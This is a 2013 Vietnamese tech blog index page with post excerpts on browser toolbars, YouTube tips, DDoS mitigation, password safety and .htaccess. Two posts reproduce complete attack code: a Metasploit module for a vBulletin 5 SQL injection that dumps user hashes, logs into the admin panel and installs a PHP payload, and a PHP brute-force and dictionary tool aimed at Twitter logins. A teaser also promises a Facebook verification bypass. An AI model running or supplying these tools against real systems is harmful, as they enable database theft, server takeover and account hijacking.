Thursday, December 19, 2013

We have already seen how to manually uninstall some toolbars which may have got installed on your Internet Explorer, Chrome, Firefox, Opera or other browsers. While in most cases it may be possible to uninstall them via the Control Panel or the respective browsers’ Add-ons Manager, in some cases, it may not be possible and you may have to use some tools to remove such persistent toolbars.

Some toolbars which are difficult to remove are Ask toolbar, Babylon toolbar, AVG SecureSearch, SiteSafety, MyFree toolbar, C duit toolbar, ZXY toolbar, Anonymization toolbar, GameNext toolbar, MPire toolbar, MyWebSearch toolbar, NetCraft toolbar, People Search toolbar, Public Record toolbar, Zango toolbar, Elite toolbar, etc. The list is endless, with many wanting to push toolbars for various reasons. It could be for making money with every install, for pushing pop-ups or for tracking down your computer usage.

ĐỌC TIẾP »

Free Toolbar Cleaner & Remover Tools for your browsers

By: MIN Software on: 10:18 AM

Thursday, December 12, 2013

Sử dụng thủ thuật này có thể thay đổi tên bộ vi xử lý của chúng ta và làm cho bạn bè ngạc nhiên. Ví dụ chúng ta có thể thay đổi tên bộ vi xử lý từ i3 lên i7 hoặc bất cứ tên nào bạn muốn. Vậy thực hiện điều đó như thế nào?


Chú ý: Thủ thuật này chỉ dành cho mục đích học hỏi.
ĐỌC TIẾP »

Hướng dẫn thay đổi tên Bộ vi xử lý của bạn

By: MIN Software on: 1:43 PM

Wednesday, December 11, 2013

http://securityaffairs.co/wordpress/wp-content/uploads/2013/10/vbullettin-hacking.jpg

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has
been used in the wild since March 2013. This module uses the sqli to extract the
web application's usernames and hashes. With the retrieved information tries to
log into the admin control panel in order to deploy the PHP payload. This module
has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
Linux distribution.
},
'Author' =>
[
'Orestis Kourides', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3522' ],
[ 'OSVDB', '92031' ],
[ 'EDB', '24882' ],
[ 'BID', '58754' ],
[ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'Space' => 10000 # Just value big enough to fit any php payload
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
'DisclosureDate' => 'Mar 25 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
OptInt.new("NODE", [false, 'Valid Node ID']),
OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
], self.class)
end

def exists_node?(id)
mark = rand_text_alpha(8 + rand(5))
result = do_sqli(id, "select '#{mark}'")

if result and result =~ /#{mark}/
return true
end

return false
end

def brute_force_node
min = datastore["MINNODE"]
max = datastore["MAXNODE"]

if min > max
print_error("#{peer} - MINNODE can't be major than MAXNODE")
return nil
end

for node_id in min..max
if exists_node?(node_id)
return node_id
end
end

return nil
end

def get_node
if datastore['NODE'].nil? or datastore['NODE'] <= 0
print_status("#{peer} - Brute forcing to find a valid node id...")
return brute_force_node
end

print_status("#{peer} - Checking node id #{datastore['NODE']}...")
if exists_node?(datastore['NODE'])
return datastore['NODE']
else
return nil
end
end

def do_sqli(node, query)
mark = Rex::Text.rand_text_alpha(5 + rand(3))
random_and = Rex::Text.rand_text_numeric(4)
injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
injection << "AND (#{random_and}=#{random_and}"

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'vars_post' =>
{
'nodeid' => "#{node}#{injection}",
}
})

unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
return nil
end

data = ""

if res.body.to_s =~ /#{mark}(.*)#{mark}/
data = $1
end

return data
end

def get_user_data(node_id, user_id)
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")

return [user, pass, salt]
end

def do_login(user, hash)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "login.php"),
'method' => 'POST',
'encode_params' => false,
'vars_get' => {
'do' => 'login'
},
'vars_post' => {
'url' => '%2Fadmincp%2F',
'securitytoken' => 'guest',
'logintype' => 'cplogin',
'do' => 'login',
'vb_login_md5password' => hash,
'vb_login_md5password_utf' => hash,
'vb_login_username' => user,
'vb_login_password' => '',
'cssprefs' => ''
}
})

if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
session = res.get_cookies
else
return nil
end

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "/"),
'cookie' => session
})

if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
return session
else
return nil
end

end

def get_token(response)
token_info = {
:session_hash => "",
:security_token => "",
:admin_hash => ""
}

if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
token_info[:session_hash] = $1
end

if response =~ /var ADMINHASH = "([0-9a-f]+)";/
token_info[:admin_hash] = $1
end

if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
token_info[:security_token] = $1
end

return token_info
end

def get_install_token
res = send_request_cgi({
"uri" => normalize_uri(target_uri.path, "admincp", "product.php"),
"vars_get" => {
"do" => "productadd"
},
"cookie" => @session
})

unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return nil
end


return get_token(res.body.to_s)
end

def install_product(token_info)

xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>

<product productid="#{@product_id}" active="0">
<title>#{@product_id}</title>
<description>#{@product_id}</description>
<version>1.0</version>
<url>http://#{@product_id}.loc</url>
<versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
<dependencies>
<dependency dependencytype="vbulletin" minversion="" maxversion="" />
</dependencies>
<codes>
<code version="*">
<installcode>
<![CDATA[
#{payload.encoded}
]]>
</installcode>
<uninstallcode />
</code>
</codes>
<templates>
</templates>
<stylevardfns>
</stylevardfns>
<stylevars>
</stylevars>
<hooks>
</hooks>
<phrases>
</phrases>
<options>
</options>
<helptopics>
</helptopics>
<cronentries>
</cronentries>
<faqentries>
</faqentries>
<widgets>
</widgets>
</product>
EOF

post_data = Rex::MIME::Message.new
post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")

# Work around an incompatible MIME implementation
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => @session,
'vars_get' => {
"do" => "productimport"
},
'data' => data
})

if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
return true
elsif res
fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
else
return false
end

end

def get_delete_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'cookie' => @session,
'vars_get' => {
"do" => "productdelete",
"productid" => @product_id,
"s" => @session_hash
}
})

if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return get_token(res.body.to_s)
end

return nil
end

def delete_product(token_info)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'cookie' => @session,
'vars_get' => {
"do" => "productkill"
},
'vars_post' => {
"s" => token_info[:session_hash],
"do" => "productkill",
"adminhash" => token_info[:admin_hash],
"securitytoken" => token_info[:security_token],
"productid" => @product_id
}
})

if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
return true
end

return false
end

def check
node_id = get_node

unless node_id.nil?
return Msf::Exploit::CheckCode::Vulnerable
end

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "index.php")
})

if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
return Msf::Exploit::CheckCode::Detected
end

return Msf::Exploit::CheckCode::Unknown
end

def on_new_session(session)
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end

print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end

def exploit
print_status("#{peer} - Checking for a valid node id...")
node_id = get_node
if node_id.nil?
print_error("#{peer} - node id not found")
return
end

print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
data = do_sqli(node_id, "select count(*) from user")
if data.empty?
print_error("#{peer} - Error exploiting sqli")
return
end
count_users = data.to_i
users = []
print_good("#{peer} - #{count_users} users found")

for i in 0..count_users - 1
user = get_user_data(node_id, i)
report_auth_info({
:host => rhost,
:port => rport,
:user => user[0],
:pass => user[1],
:type => "hash",
:sname => (ssl ? "https" : "http"),
:proof => "salt: #{user[2]}" # Using proof to store the hash salt
})
users << user
end

@session = nil
users.each do |user|
print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
@session = do_login(user[0], user[1])
unless @session.blank?
print_good("#{peer} - Logged in successfully as #{user[0]}")
break
end
end

if @session.blank?
fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
end

print_status("#{peer} - Getting the install product security token...")
install_token = get_install_token
if install_token.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
end

@session_hash = install_token[:session_hash]
@product_id = rand_text_alpha_lower(5 + rand(8))
print_status("#{peer} - Installing the malicious product #{@product_id}...")
if install_product(install_token)
print_good("#{peer} - Product successfully installed... payload should be executed...")
else
# Two situations trigger this path:
# 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
# 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
# Because of that fail_with isn't used here.
return
end

print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end

print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end

end


end

Nguồn: http://www.exploit-db.com/exploits/30212/

ĐỌC TIẾP »

vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection

By: MIN Software on: 1:01 PM

Sunday, December 8, 2013

Không ngạc nhiên khi tất cả chúng ta đều rất quen thuộc với cái tên Youtube. Đây là kênh Video trực tuyến lớn nhất trên thế giới. Bất cứ khi nào bạn muốn xem bất kì video âm nhạc nào mới phát hành, chương trình yêu thích mà bạn bỏ lỡ trên TV, thể thao trực tiếp, những video hài hước, những thủ thuật thú vị, video công nghệ và nhiều hơn thế nữa có sẵn bất cứ khi nào trên Youtube.

http://vcn.edu.vn/uploads/youtube-logo.png 

Đó là những lý do để chúng ta phụ thuộc vào Youtube cho nhiều mục đích khác nhau nhưng ngoài ra có rất nhiều thủ thuật mà có thể mang lại cho bạn một cách tốt hơn và hiệu quả hơn để sử dụng YouTube. Vì vậy, ở đây tôi sẽ chia sẻ một số thủ thuật Youtube thú vị và rất hữu ích với bạn.
ĐỌC TIẾP »

Những thủ thuật Youtube thú vị bạn phải biết

By: MIN Software on: 7:16 AM

Sunday, December 1, 2013


ABSTRACT
The evolution of technology has reached a point that necessitated the emergence of communication protocols, there was then the spread of the HTTP protocol and the HTML language initially, in the early 90s, the web pages have become a major means of communication between users, governments, institutions and professionals.
The "HyperText Transfer Protocol" is a protocol application responsible for handling requests and responses between "client and server" in the "World Wide Web", came up with the purpose of distributing information over the Internet, also to communicate between computers and specifications would be performed as transactions between clients and servers, through the use of rules.

ĐỌC TIẾP »

The Beginning Of The Web Pages And Google Hacking

By: MIN Software on: 9:02 AM

Sunday, November 24, 2013

Clickjacking là một loại hình tấn công liên quan trực tiếp với người dùng và không thể diễn ra nếu không có sự tham gia của người dùng. Theo nghĩa nào đó, Clickjacking một kỹ thuật nhằm đánh cắp các “cú click” của người dùng.

ĐỌC TIẾP »

Clickjacking: Quá khứ, hiện tại và tương lai

By: MIN Software on: 2:38 PM

Friday, November 15, 2013

Firefox lúc hoạt động cũng như khi ở trạng thái minimize đều chiếm dung lượng bộ nhớ rất nhiều. Tuy nhiên nếu bạn biết một số tính năng ẩn của nó, sẽ cải thiện được đáng kể tốc độ của phần mềm này. Thủ thuật nhỏ và đơn giản dưới đây sẽ giúp bạn giải quyết vấn đề này,

ĐỌC TIẾP »

Tối ưu hoá trình duyệt Firefox để duyệt web nhanh hơn

By: MIN Software on: 3:47 PM

Wednesday, November 13, 2013

DDoS
DDoS và nguyên tắc hành động cụ thể

Sau hai notes:
- DDoS và nguyên tắc chống chọi.
- DDoS và nguyên tắc phân tích gói tin.

Một số bạn hỏi tôi "hành động cụ thể" ra làm sao? Đây là câu hỏi khó vì mitigate DDoS là công việc cực kỳ khó khăn. Việc này chẳng những đòi hỏi phải am hiểu giao thức mạng một cách tinh tế để xác định mình đang bị tấn công như thế nào mà còn đòi hỏi thấu đáo mô hình, cấu trúc, công nghệ và cách quản lý của hệ thống đang bị lâm nạn. Không có một thiết bị kỳ diệu nào có thể tự động nhận diện và khắc phục DDoS một cách dễ dàng cả.

Như tôi đã đề cập trong bài đầu tiên: "Cản lọc không dừng lại ở MỖI TẦNG mà ở trên TẤT CẢ CÁC TẦNG GIAO THỨC bất cứ nơi đâu có thể được, thậm chí phối hợp giữa các tầng." và việc này chỉ có thể do NGƯỜI THẬT thực hiện. Hãy bàn đến mô hình để nắm rõ hơn tại sao việc thấu đáo nó là tối quan trọng.


ĐỌC TIẾP »

DDoS và nguyên tắc hành động cụ thể

By: MIN Software on: 11:02 AM
DDoS
DDoS và nguyên tắc phân tích gói tin

Như đã đề cập ở bài trước (xem tại đây)

Giảm thiểu tác hại của DDoS có hai hướng chính:
1) Giảm thiểu bằng cách cản lọc những đặc điểm cụ thể.
2) Giảm thiểu bằng cách cản lọc theo ấn định số lần truy cập trong một khoản thời gian (nếu không tìm ra được đặc điểm cụ thể).

Từ những thông tin nào có thể giúp mình thực hiện việc giảm thiểu ấy? Cách khó nhất, tỉ mỉ nhất nhưng cũng chính xác nhất là lấy thông tin từ những gói tin bắt được trong lúc chúng tràn vào mục tiêu (để thực hiện việc DDoS).

ĐỌC TIẾP »

DDoS và nguyên tắc phân tích gói tin

By: MIN Software on: 10:52 AM
DDoS
DDoS và nguyên tắc chống chọi

Tóm tắt những điểm tối quan trọng trong việc chống chọi với DDoS (distributed denial of service attack) cho những ai quan tâm.

- DDoS có nhiều dạng, nhiều biến thái tấn công nhưng tựu trung có một mục đích: làm người dùng không thể sử dụng được dịch vụ.

- DDoS có hai dạng chính:
1) làm ngập băng thông khiến cho người dùng không thể truy cập dịch vụ.
2) làm cho dịch vụ hoàn toàn tê liệt vì hết tài nguyên khiến cho người dùng không thể truy cập dịch vụ.

Chống đỡ hai dạng trên đều đòi hỏi gia tăng tài nguyên (băng thông, CPU, diskspace, memory). Tài nguyên càng phát tán rộng ra nhiều network càng tốt.


ĐỌC TIẾP »

DDoS và nguyên tắc chống chọi

By: MIN Software on: 10:39 AM
Trong bài trước (xem tại đây), ba thủ thuật đơn giản đã được giới thiệu nhằm giảm thiểu hiểm hoạ "mất mật khẩu" khi dùng máy công cộng. Phần thứ nhì đi sâu vào việc chuẩn bị một biện pháp khác có khả năng giảm thiểu hiểm hoạ bị mất mật khẩu ở mức độ tốt hơn. Tuy nhiên, nó đòi hỏi một quy trình chuẩn bị khá tỉ mỉ.


Tạo và sử dụng USB key có chứa phần mềm quản lý mật khẩu:
Đây có lẽ là biện pháp an toàn nhất khi sử dụng máy tính công cộng để đăng nhập nếu máy tính công cộng ấy cho phép gắn USB key vào máy. USB key là một thiết bị nhỏ gọn, khá rẻ tiền và thông dụng:


Bạn có thể mua một USB key ở bất cứ một tiệm bán đồ máy tính nào với dung lượng nhỏ (vì không cần dung lượng lớn). Một USB key chừng 64Mb là thừa để dùng rồi. Quy trình chuẩn bị này cần thực hiện trên một máy SẠCH, có nghĩa là bạn tin tưởng máy ấy không có mã độc.

ĐỌC TIẾP »

Bảo mật cá nhân - Sử dụng máy công cộng - Phần 2

By: MIN Software on: 10:21 AM
Vài năm gần đây, Internet và máy tính trở thành một phần của mọi sinh hoạt hàng ngày, từ chuyên gia cho đến các cháu học sinh từ các bà nội trợ đến các ông bà cụ. Không may, tình trạng "mất mật khẩu", "bị đánh cắp mật khẩu", "mất tài khoản" trở thành chuyện bình thường đến mức đáng sợ. Tuy vậy, nếu trang bị một số kiến thức căn bản và sự cẩn thận đúng mức thì có thể giảm thiểu phần lớn tình trạng "bị mất cắp". Bài viết này tập trung vào tình trạng bảo mật của máy tính và người dùng Internet ở Việt Nam cho người dùng sử dụng máy trên hệ điều hành Windows.

ĐỌC TIẾP »

Bảo mật cá nhân - Sử dụng máy công cộng - Phần 1

By: MIN Software on: 10:06 AM
Công nghệ thông tin
Công nghệ thông tin

1. Không chịu đọc tài liệu trước khi dùng

Đây là một trong những thói quen tệ hại nhất nhưng lại thường gặp nhất. Có lẽ thói quen này nảy sinh từ tính thân thiện của "giao diện đồ hình" (GUI) khiến cho người dùng bồi đắp thói quen mò mẫm mà không cần đọc hướng dẫn nhưng cũng sử dụng được máy. Việc này không có gì đáng ngại đối với người dùng (rất) bình thường. Tuy nhiên, nếu bạn có ý định theo đuổi ngành CNTT một cách nghiêm túc thì hãy bỏ ngay thói quen tai hại này bởi vì đây là rào cản lớn nhất cho sự phát triển. Kiến thức vững chắc không phải... mò mà ra. Tài liệu hướng dẫn không phải vô cớ mà được viết ra.


ĐỌC TIẾP »

Chín thói quen xấu cần bỏ nếu muốn theo ngành CNTT

By: MIN Software on: 9:46 AM

Monday, November 4, 2013

http://www.theredheadriter.com/wp-content/uploads/2012/05/Twitter-Account-Hacked-Twitter-Bird.jpg

<?php
/////////////////////////////////////////////////////
////Twitter Brute Force By Mauritania Attacker//////
///////////////////////////////////////////////////

///////////////////////////////////////////////////
////Changing Description won't make you the Coder/
/////////////////////////////////////////////////


////////////////////////////////////////////////////////////////////////////
# This script was created to Brute Force Twitter Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
///////////////////////////////////////////////////////////////////////////

$dic ="pass.txt";
//////////////////////////////////////////////////////////////////////////



echo "
<title>Twitter Brute Force By Mauritania Attacker</title>
</head>
<style type='text/css'>
body {


font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:BLUE;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>

</div>
</td>
</tr>
<tr>
<td>
<div align='center'>

</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Target User:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>

</div>
</td>
</tr>
</table>
";
// Sets variables and retrives twitter error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: stream.twitter.com",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}

?>

[PHP] Twitter Brute Force

By: MIN Software on: 6:21 PM

Thursday, October 31, 2013

Tối ưu và tăng tốc xử lý khi lập trình PHP không chỉ giúp website chạy ổn định mà còn giúp tiết kiệm tài nguyên xử lý của máy chủ website.

Khi học và làm việc với PHP lần đầu, đa phần các lập trình viên đều có xu hướng học lướt các kiến thức căn bản để tập trung vào phần viết ứng dụng. Cũng chính vì lý do đó mà phần lớn những điểm nhấn quan trọng trong PHP thường là sẽ bị bỏ qua.



Bài viết này, với mong muốn tổng hợp và đưa đến cái nhìn bao quát, đầy đủ trong lập trình PHP. Qua đó giúp các bạn có cái nhìn đầy đủ và hiểu sâu các vấn đề hơn.

ĐỌC TIẾP »

Thủ thuật tối ưu hóa khi lập trình PHP

By: MIN Software on: 9:13 AM

Tuesday, October 29, 2013

Okay so i am gonna show you guys a little trick to bypass the Facebook Verification (Verify Images).

ĐỌC TIẾP »

How to bypass Facebook photo tag verification or identify photos of your friends

By: MIN Software on: 7:56 AM

Friday, October 25, 2013

http://lamseowebtop.com/wp-content/uploads/2012/06/seo-la-gi.jpg

Một tiện ích không thể thiếu. Cung cấp cho bạn những thông tin cơ bản như PR, số lượng index, rank alexa, tuổi đời domain, backlink mạng xã hội, internal link và external link.
Đặc biệt phiên bản mới cung cấp phân tích tổng thể ( Diagnosis ), cho bạn các thông số cực kỳ cần thiết như title, description, các thẻ H1, H2 … Một công cụ tuyệt vời thay thế cho Woorank.com ( giờ đã thu phí )

ĐỌC TIẾP »

Những add-on hỗ trợ SEO website

By: MIN Software on: 9:03 AM

Thực ra thì mình thấy có khá nhiều bài viết về bảo mật tài khoản trên mạng xã hội rồi (đặc biệt là Facebook), nên bài viết này Juno_okyo sẽ viết và chia sẻ theo kinh nghiệm cá nhân.

1. Sử dụng Mật khẩu mạnh
Một mật khẩu mạnh:
  • Có ít nhất 15 kí tự;
  • Có chữ hoa;
  • Có chữ thường;
  • Có chữ số;
  • Có kí tự như: ` ! " ? $ ? % ^ & * ( ) _ - + = { [ } ] : ; @ ' ~ # | \ < , > . ? /
  • Không giống như mật khẩu trước đó của bạn (trường hợp đổi mật khẩu).
  • Không phải là tên của bạn.
  • Không phải là tên đăng nhập.
  • Không phải là tên bạn bè của bạn.
  • Không phải là tên thành viên trong gia đình bạn.
  • Không phải là một từ trong từ điển.
  • Không phải là một tên chung.
  • Không phải là một mẫu trên bàn phím kiểu như: qwerty, asdfghjkl, or 12345678.
Nếu "quá khó" để nghĩ ra một mật khẩu đủ mạnh và tuân theo các quy tắc an toàn trên, bạn có thể sử dụng các công cụ tạo mật khẩu mạnh ngẫu nhiên như strongpasswordgenerator.com
ĐỌC TIẾP »

Hướng dẫn bảo mật tài khoản Facebook

By: MIN Software on: 2:35 AM

Thursday, October 24, 2013

http://www.igorescobar.com/blog/wp-content/uploads/2011/11/apache_htaccess.jpg
1. .htaccess là gì?

1.1. .htaccess là gì

.htaccess là một file cấu hình sử dụng cho các web server chạy Apache. .htaccess dùng để thiết lập các tùy chọn: thực thi hay loại bỏ các chức năng, tính năng của Apache

ĐỌC TIẾP »

Một số cấu hình trên file .htaccess

By: MIN Software on: 8:55 AM
I. Khái niệm chung


  • Thông thường, khi host một site lên server thì người dùng sẽ được cấp một tài khoản người dùng và một thư mục để quản lý site của mình. Ví dụ tài khoản user1 được cấp thư mục /home/user1 để quản lý site của user1. Tương tự như vậy, tài khoản user2 được cấp thư mục /home/user2 để quản lý site của user2. Bằng cách nào đó, hacker có thể chiếm giữ /home/user2 và dùng các script (shell) để truy nhập vào /home/user1. Cách thức tấn công dựa vào các script ở site của user này để tấn công vào site của user khác trên cùng một server được gọi là Local Attack.

ĐỌC TIẾP »

Tìm hiểu về Local Attack

By: MIN Software on: 8:23 AM
http://www.tejasbarot.com/wp-content/uploads//dnsimage.jpg

I. Khái niệm

- Fast flux DNS là một kĩ thuật các botnet sử dụng để che giấu các trang web lừa đảo, có mã độc phía sau một mạng các máy tính bị kiểm soát đóng vai trò là proxy. Những máy tính trong mạng này có các bản ghi DNS thay đổi rất nhanh, một số trường hợp chỉ trong vòng vài phút. Cơ cấu thay đổi bản ghi DNS nhanh chóng này khiến việc tìm ra và chặn đứng các hoạt động bất hợp pháp trở nên khó khăn hơn nhiều.

- Fast flux DNS được nhận biết vào tháng 11/2006 nhưng đến tháng 7/2007 mới bắt đầu gây được sự chú ý.

ĐỌC TIẾP »

Fast flux DNS

By: MIN Software on: 8:12 AM

Wednesday, October 23, 2013

Những lời đồn đại về việc tăng tính bảo mật cho mạng WiFi mà ta nên gạt bỏ ngay từ bây giờ.

Đi cùng với sự tiếp nhận mạnh mẽ của cộng đồng và các hãng sản xuất phần cứng đối với công nghệ Wifi, các công nghệ bảo mật đi kèm với chuẩn mạng không dây này cũng theo đó mà ngày càng phát triển.

Vào những ngày đầu khi mà Wifi còn mới chập chững bước vào thị trường, ta có thể dễ dàng bắt gặp mẹo và nhiều khuyến cáo về bảo mật từ các nguồn tin không chính thức trên mạng Internet.
ĐỌC TIẾP »

Các lầm tưởng thường gặp về bảo mật WiFi

By: MIN Software on: 12:02 AM

Monday, October 21, 2013

[Image 01]

Video sử dụng làm demo trong bài viết này:
Cách 1:
Các bạn có thể bypass bằng cách sửa lại URL theo cấu trúc sau:
http://www.youtube.com/v/VIDEO_ID
Ví dụ:
http://www.youtube.com/v/ngPNKXHQe0c
Tức là các bạn thay đoạn watch?v= thành v/.

ĐỌC TIẾP »

